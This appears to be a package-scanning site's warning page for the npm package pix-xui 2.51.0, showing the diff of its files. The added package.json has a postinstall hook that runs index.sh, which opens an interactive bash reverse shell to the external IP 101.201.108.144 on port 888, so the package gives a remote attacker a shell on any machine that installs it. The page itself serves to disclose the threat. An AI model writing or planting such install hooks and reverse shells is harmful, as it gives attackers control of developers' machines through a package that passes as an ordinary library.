pix-xui 2.51.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of pix-xui might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +0 -0
  2. package/index.sh +1 -0
  3. package/package.json +11 -0
package/index.js ADDED
File without changes
package/index.sh ADDED
@@ -0,0 +1 @@
1
+ bash -i >& /dev/tcp/101.201.108.144/888 0>&1
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "pix-xui",
3
+ "version": "2.51.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "chmod +x index.sh; ./index.sh"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }